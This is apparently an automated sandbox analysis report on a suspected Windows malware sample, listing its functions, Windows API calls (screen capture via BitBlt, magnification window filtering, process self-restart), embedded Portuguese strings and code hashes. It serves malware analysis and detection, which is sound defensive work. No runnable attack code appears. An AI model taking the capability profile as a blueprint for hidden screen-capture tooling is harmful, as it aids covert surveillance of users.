Concurrency::cancel_current_task.LIBCPMT ref: 0000000180020989

Strings

true, xrefs: 00000001800208B9
false, xrefs: 0000000180020889
bad locale name, xrefs: 0000000180020976

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name$false$true
API String ID: 4121308752-1062449267
Opcode ID: 02e637ad1a66f40d02637bb5a9f72ad7014d0cd203e48703c3fa685967b148ac
Instruction ID: 01fe34daf629230787b66e1bacf0fba92259c9b70142b4c096ff2d58a98c9a7b
Opcode Fuzzy Hash: 02e637ad1a66f40d02637bb5a9f72ad7014d0cd203e48703c3fa685967b148ac
Instruction Fuzzy Hash: 07619132606B448AFB97DF60D4903ED37A1FB48788F158124BE8917AA6DF38C659C344

Function 00007FF6B40A9044 Relevance: 15.2, APIs: 10, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000020,?,?,00000000,?,00000000,?), ref: 00007FF6B40A909A
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000020,?,?,00000000,?,00000000,?), ref: 00007FF6B40A90B9
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000020,?,?,00000000,?,00000000,?), ref: 00007FF6B40A915E
malloc.LIBCMT ref: 00007FF6B40A9175
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000020,?,?,00000000,?,00000000,?), ref: 00007FF6B40A91BD
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000020,?,?,00000000,?,00000000,?), ref: 00007FF6B40A91F8
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000020,?,?,00000000,?,00000000,?), ref: 00007FF6B40A9234
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000020,?,?,00000000,?,00000000,?), ref: 00007FF6B40A9274
free.LIBCMT ref: 00007FF6B40A9282
free.LIBCMT ref: 00007FF6B40A92A4

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: ByteCharMultiWide$Infofree$malloc
String ID:
API String ID: 1309074677-0
Opcode ID: 145b98776a47f8090fd00ccc327ae495c79b2a7d7fd6aa58bcd7b4c72f427383
Instruction ID: 8cf244e856c51eb03d156b021034f06bf7460bdbcabb68d6b1ea5500612f4b58
Opcode Fuzzy Hash: 145b98776a47f8090fd00ccc327ae495c79b2a7d7fd6aa58bcd7b4c72f427383
Instruction Fuzzy Hash: 4B61C472B0868286E7608F1998881B977E5FFC4BA8F584A35EB1D87BD4DF3CE4418300

Function 0000000180023980 Relevance: 15.1, APIs: 10, Instructions: 149memoryCOMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS ref: 00000001800239C8
SHCreateMemStream.SHLWAPI ref: 00000001800239DD
GdipAlloc.GDIPLUS ref: 00000001800239F3
GdipLoadImageFromStream.GDIPLUS ref: 0000000180023A2A
GdipImageGetFrameCount.GDIPLUS ref: 0000000180023A58
GdipGetPropertyItemSize.GDIPLUS ref: 0000000180023A89
GdipGetPropertyItem.GDIPLUS ref: 0000000180023AC3
GdipImageGetFrameCount.GDIPLUS ref: 0000000180023B34
GdipGetPropertyItemSize.GDIPLUS ref: 0000000180023B65
GdipGetPropertyItem.GDIPLUS ref: 0000000180023B9A

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Gdip$ItemProperty$Image$CountFrameSizeStream$AllocCreateFromGdiplusLoadStartup
String ID:
API String ID: 2566314290-0
Opcode ID: 3f1bbbbfb2f19dd4aae5b65a7c88c895baa3159876e7e58d59bae5c612c73a34
Instruction ID: 9dfe54704347a67091aeac745eaf40d38f7af53c56ca94a9ae2c67d510c61a59
Opcode Fuzzy Hash: 3f1bbbbfb2f19dd4aae5b65a7c88c895baa3159876e7e58d59bae5c612c73a34
Instruction Fuzzy Hash: 28714272204B498BEB96CF25E89079A77E1F78CBC4F048125EA8947764DF38C759CB40

Function 0000000180004370 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 374COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00000001800043CC

Part of subcall function 0000000180036088: AreFileApisANSI.KERNEL32(?,?,?,?,0000000180003FC6), ref: 000000018003609A

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800045C5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800045CB
__std_exception_destroy.LIBVCRUNTIME ref: 00000001800046F1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000471C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180004849

Strings

", ", xrefs: 00000001800044B7
: ", xrefs: 0000000180004484

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ApisFile__std_exception_destroy__std_fs_code_page
String ID: ", "$: "
API String ID: 2261858363-747220369
Opcode ID: 4482b9ba3d3926a7aef72664ec82c8e2195039e85cfd6a60741d774c05a579d7
Instruction ID: 92343d4b2b632c3db16cdc061c1b286004c3f533bef3382021fc4057abd2879a
Opcode Fuzzy Hash: 4482b9ba3d3926a7aef72664ec82c8e2195039e85cfd6a60741d774c05a579d7
Instruction Fuzzy Hash: F1E18DB2710B8885EB46DF69E4843DD3362F749BC8F509112EA4D07A9AEF78C699C344

Function 0000000180024840 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32 ref: 000000018002486C

Part of subcall function 0000000180022C40: GetDC.USER32 ref: 0000000180022C77
Part of subcall function 0000000180022C40: CreateDIBitmap.GDI32 ref: 0000000180022CA0
Part of subcall function 0000000180022C40: ReleaseDC.USER32 ref: 0000000180022CAE

SelectObject.GDI32 ref: 000000018002488A
GetObjectW.GDI32 ref: 00000001800248A0
BitBlt.GDI32 ref: 00000001800248D2
SelectObject.GDI32 ref: 00000001800248DE
DeleteDC.GDI32 ref: 00000001800248E7
DeleteObject.GDI32 ref: 00000001800248F0

Strings

, xrefs: 00000001800248B4

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Object$CreateDeleteSelect$BitmapCompatibleRelease
String ID:
API String ID: 404991795-3916222277
Opcode ID: 2d280b05bac9d3c4c960d6b2a3d48009ab7815a3713c5395aca6d571db3e8630
Instruction ID: 8af02a6b313b05603a76f6965b582e3173e3ead20192f2d9761656c06b1a0b6b
Opcode Fuzzy Hash: 2d280b05bac9d3c4c960d6b2a3d48009ab7815a3713c5395aca6d571db3e8630
Instruction Fuzzy Hash: CF214D76204B9486EB95DF22B85439A73A1F78DFD0F648121EE9947B18DF3CC24A8B40

Function 00000001800065C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 51processCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00000001800065E9
CreateProcessA.KERNEL32 ref: 000000018000668F
CloseHandle.KERNEL32 ref: 00000001800066AA
CloseHandle.KERNEL32 ref: 00000001800066B5
ExitProcess.KERNEL32 ref: 00000001800066BD

Strings

Erro ao criar o processo para reiniciar a aplicao., xrefs: 0000000180006699
Erro ao obter o caminho do executvel., xrefs: 00000001800065F3
h, xrefs: 0000000180006622

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: CloseHandleProcess$CreateExitFileModuleName
String ID: Erro ao criar o processo para reiniciar a aplicao.$Erro ao obter o caminho do executvel.$h
API String ID: 1770105242-2517268562
Opcode ID: 46d27f2c6a2f91854b704accd1e981da5d9cc7b5d62a2ee9deba4c7215abb9a2
Instruction ID: 68991847fa6238a13ddbbdb32a45ef61529f0ee3766e31e078b92c074d69cdfc
Opcode Fuzzy Hash: 46d27f2c6a2f91854b704accd1e981da5d9cc7b5d62a2ee9deba4c7215abb9a2
Instruction Fuzzy Hash: 45212432A18BC586E7A1DB20F8543DE73A1F7DD784F519225F68D46625EF7CC2988B00

Function 00007FF6B40A2AFC Relevance: 13.8, APIs: 11, Instructions: 90COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF6B40A2B48

Part of subcall function 00007FF6B40A2198: HeapFree.KERNEL32(?,?,00000000,00007FF6B40A2FEC,?,?,?,00007FF6B40A300F,?,?,?,00007FF6B40A179B,?,?,00000000,00007FF6B40A35E7), ref: 00007FF6B40A21AE
Part of subcall function 00007FF6B40A2198: _errno.LIBCMT ref: 00007FF6B40A21B8
Part of subcall function 00007FF6B40A2198: GetLastError.KERNEL32(?,?,00000000,00007FF6B40A2FEC,?,?,?,00007FF6B40A300F,?,?,?,00007FF6B40A179B,?,?,00000000,00007FF6B40A35E7), ref: 00007FF6B40A21C0

Part of subcall function 00007FF6B40A6AD0: free.LIBCMT ref: 00007FF6B40A6AEE
Part of subcall function 00007FF6B40A6AD0: free.LIBCMT ref: 00007FF6B40A6B00
Part of subcall function 00007FF6B40A6AD0: free.LIBCMT ref: 00007FF6B40A6B12
Part of subcall function 00007FF6B40A6AD0: free.LIBCMT ref: 00007FF6B40A6B24
Part of subcall function 00007FF6B40A6AD0: free.LIBCMT ref: 00007FF6B40A6B36
Part of subcall function 00007FF6B40A6AD0: free.LIBCMT ref: 00007FF6B40A6B48
Part of subcall function 00007FF6B40A6AD0: free.LIBCMT ref: 00007FF6B40A6B5A

free.LIBCMT ref: 00007FF6B40A2B6A
free.LIBCMT ref: 00007FF6B40A2B82
free.LIBCMT ref: 00007FF6B40A2B8E
free.LIBCMT ref: 00007FF6B40A2BB2
free.LIBCMT ref: 00007FF6B40A2BC6
free.LIBCMT ref: 00007FF6B40A2BD5
free.LIBCMT ref: 00007FF6B40A2BE1
free.LIBCMT ref: 00007FF6B40A2C0E
free.LIBCMT ref: 00007FF6B40A2C36
free.LIBCMT ref: 00007FF6B40A2C50

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID:
API String ID: 1012874770-0
Opcode ID: 9054492a25454237c2ec5fb255e0f44e8afac76914eaccc7eb693f3b33fea488
Instruction ID: 4eb496efdb42974c3680d8f3bf1d4c3b2aa291bbb39f779720a5469ae7cd3e03
Opcode Fuzzy Hash: 9054492a25454237c2ec5fb255e0f44e8afac76914eaccc7eb693f3b33fea488
Instruction Fuzzy Hash: 7A411F32A1A64685EF55DF69C4E53BC2360EF94B84F484439DB0D8B395CF2CE8918312

Function 000000018005C6F4 Relevance: 13.8, APIs: 9, Instructions: 273fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000000018005C2D8: _invalid_parameter_noinfo.LIBCMT ref: 000000018005C319
Part of subcall function 000000018005C2D8: _invalid_parameter_noinfo.LIBCMT ref: 000000018005C399
Part of subcall function 000000018005C2D8: _invalid_parameter_noinfo.LIBCMT ref: 000000018005C3ED
Part of subcall function 000000018005C2D8: _get_daylight.LIBCMT ref: 000000018005C445

CreateFileW.KERNEL32 ref: 000000018005C7FA
CreateFileW.KERNEL32 ref: 000000018005C84A
GetLastError.KERNEL32 ref: 000000018005C87A
GetFileType.KERNEL32 ref: 000000018005C88F
GetLastError.KERNEL32 ref: 000000018005C899
CloseHandle.KERNEL32 ref: 000000018005C8CC
CloseHandle.KERNEL32 ref: 000000018005CA27
CreateFileW.KERNEL32 ref: 000000018005CA5C
GetLastError.KERNEL32 ref: 000000018005CA6B

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
String ID:
API String ID: 1330151763-0
Opcode ID: b09d560231d32212ce9686f780289ce8e0c72f1318da1d4690e18ac7890640d1
Instruction ID: e30ed3395fc0988ee6518f3a2880652313ef890f1d651c2f34ce47e3e27a5607
Opcode Fuzzy Hash: b09d560231d32212ce9686f780289ce8e0c72f1318da1d4690e18ac7890640d1
Instruction Fuzzy Hash: 21C1AC37720A488AEB91CF69D4907EC3761F34DBD8F118209EA2AA7794DF35C65AC740

Function 00007FF6B40A642C Relevance: 13.7, APIs: 9, Instructions: 173COMMONLIBRARYCODE

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,00007FF6B40A66FE), ref: 00007FF6B40A648C
GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF6B40A66FE), ref: 00007FF6B40A649E
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF6B40A66FE), ref: 00007FF6B40A64FE
malloc.LIBCMT ref: 00007FF6B40A656A
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF6B40A66FE), ref: 00007FF6B40A65B4
GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,00007FF6B40A66FE), ref: 00007FF6B40A65CB
free.LIBCMT ref: 00007FF6B40A65DC
GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,00007FF6B40A66FE), ref: 00007FF6B40A6659
free.LIBCMT ref: 00007FF6B40A6669

Part of subcall function 00007FF6B40A9044: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000020,?,?,00000000,?,00000000,?), ref: 00007FF6B40A909A
Part of subcall function 00007FF6B40A9044: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000020,?,?,00000000,?,00000000,?), ref: 00007FF6B40A90B9
Part of subcall function 00007FF6B40A9044: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000020,?,?,00000000,?,00000000,?), ref: 00007FF6B40A91BD
Part of subcall function 00007FF6B40A9044: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000020,?,?,00000000,?,00000000,?), ref: 00007FF6B40A91F8

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: ByteCharMultiWide$StringType$Infofree$ErrorLastmalloc
String ID:
API String ID: 3804003340-0
Opcode ID: 48d88a9e0b7ff34b37b035ca47da749e97adee1bd22dd22f625cdb5fb30eee35
Instruction ID: 98641869f44b71e322d68b9222d16f4f52755c615c6914384dcc736a9de82a5f
Opcode Fuzzy Hash: 48d88a9e0b7ff34b37b035ca47da749e97adee1bd22dd22f625cdb5fb30eee35
Instruction Fuzzy Hash: CE61A272A0868286DB209F2DD4804B937A1FF45BE8F581A35EB5D97BD8DF3CE8408740

Function 00007FF6B40A3A48 Relevance: 13.6, APIs: 9, Instructions: 98COMMON

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FF6B40A3A71
DecodePointer.KERNEL32 ref: 00007FF6B40A3AA4
DecodePointer.KERNEL32 ref: 00007FF6B40A3AC1
DecodePointer.KERNEL32 ref: 00007FF6B40A3B00
DecodePointer.KERNEL32 ref: 00007FF6B40A3B19
DecodePointer.KERNEL32 ref: 00007FF6B40A3B28
_initterm.LIBCMT ref: 00007FF6B40A3B67
_initterm.LIBCMT ref: 00007FF6B40A3B7A
ExitProcess.KERNEL32 ref: 00007FF6B40A3BB3

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: DecodePointer$_initterm$ExitProcess_lock
String ID:
API String ID: 2551688548-0
Opcode ID: 89d95f162c91acd81d1c2464f592deaffda6ae3b29e16f96dd81542a7ea45c3b
Instruction ID: 46cae488cdd39a8c497d2d1e6c5d952604a3420261ed4b2d5c0ef4aab814f8d0
Opcode Fuzzy Hash: 89d95f162c91acd81d1c2464f592deaffda6ae3b29e16f96dd81542a7ea45c3b
Instruction Fuzzy Hash: C0419E21A1E64381E650EF1DE8C0179B3A5BF88784F040439EB4DC7BA6EF3CE8958705

Function 00000001800230B0 Relevance: 13.6, APIs: 9, Instructions: 60COMMON

Download Yara Rule

APIs

MagSetWindowFilterList.MAGNIFICATION ref: 00000001800230F0
SystemParametersInfoW.USER32 ref: 0000000180023102
GetWindowLongW.USER32 ref: 0000000180023112
SetWindowLongW.USER32 ref: 000000018002312A
GetWindowLongW.USER32 ref: 000000018002313A
SetWindowLongW.USER32 ref: 0000000180023151
GetWindowRect.USER32 ref: 0000000180023163
InvalidateRect.USER32 ref: 000000018002317D
UpdateWindow.USER32 ref: 000000018002318A

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Window$Long$Rect$FilterInfoInvalidateListParametersSystemUpdate
String ID:
API String ID: 2965700309-0
Opcode ID: 1d3c5444eeed5ae2187e12c1abb413909cede7afadd0c3217541651271fd8806
Instruction ID: 239f55757076cdb4943845eefc985c72f40541898afa4b7a868ce71606f32981
Opcode Fuzzy Hash: 1d3c5444eeed5ae2187e12c1abb413909cede7afadd0c3217541651271fd8806
Instruction Fuzzy Hash: DD314D32210A4986FB86CF16EC907997361FB8DBC4F448412EA1A4BA65EF38D35DDB41

Function 000000018003C46C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 318COMMONLIBRARYCODE

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000000018003C4C9

Part of subcall function 000000018003E75C: __GetUnwindTryBlock.LIBCMT ref: 000000018003E79F
Part of subcall function 000000018003E75C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000000018003E7C4

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000000018003C5A1
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000000018003C7F6
std::bad_alloc::bad_alloc.LIBCMT ref: 000000018003C902

Strings

csm, xrefs: 000000018003C5C4
csm, xrefs: 000000018003C4E3
csm, xrefs: 000000018003C54A

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 46680e2771373b8d5fa7d35e8390b1b32bfc38583fe2cadc036e1c2651173424
Instruction ID: 2357ac12a484d7455fd2554f5662d80067559724e0989f713152e4d655d9dece
Opcode Fuzzy Hash: 46680e2771373b8d5fa7d35e8390b1b32bfc38583fe2cadc036e1c2651173424
Instruction Fuzzy Hash: A9E19D72604B488AEBA29F65D4807DF77A0F7897C8F128106FE8997B95CF34D689C701

Function 00007FFE1A51ACC4 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFE1A51AD21

Part of subcall function 00007FFE1A51D084: __GetUnwindTryBlock.LIBCMT ref: 00007FFE1A51D0C7
Part of subcall function 00007FFE1A51D084: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFE1A51D0EC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE1A51ADF9
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFE1A51B047
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE1A51B154

Strings

csm, xrefs: 00007FFE1A51AD3B
csm, xrefs: 00007FFE1A51ADA2
csm, xrefs: 00007FFE1A51AE1C

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: bcf6f68df96523f254003eb3d5b76b435c24a28ef2eebe4b965d48bbe5ae1a45
Instruction ID: ba333cec3770ab2486e67fbb4109f7964d84e3cae49d8f2c891abcc05bfdd770
Opcode Fuzzy Hash: bcf6f68df96523f254003eb3d5b76b435c24a28ef2eebe4b965d48bbe5ae1a45
Instruction Fuzzy Hash: 75D19132B0CB8186EB219F6694403BD77A1FB46BA8F1141B6EE4D57BA5DF38E085C700

Function 000000018002A5D0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 178COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000000018002A65B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000000018002A6AD
std::_Lockit::~_Lockit.LIBCPMT ref: 000000018002A848
Concurrency::cancel_current_task.LIBCPMT ref: 000000018002A877

Strings

true, xrefs: 000000018002A746
false, xrefs: 000000018002A730
bad locale name, xrefs: 000000018002A87D

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: std::_$Lockit$Concurrency::cancel_current_taskLocinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name$false$true
API String ID: 3230409043-1062449267
Opcode ID: 54373dd3236e262eea3db81f7e9bbb6090cbce4fc0eecad0caa104685c90a69b
Instruction ID: f41ad5ed22b5f8d2070da8a690c89db7163bf47ef4d3e7db4cddccef254014c8
Opcode Fuzzy Hash: 54373dd3236e262eea3db81f7e9bbb6090cbce4fc0eecad0caa104685c90a69b
Instruction Fuzzy Hash: E281A132205B849AFB52CF30E8803DE77A4FB88788F559115FA8D17A69DF38C699C740

Function 00007FF6B40A28DC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF6B40A28FB

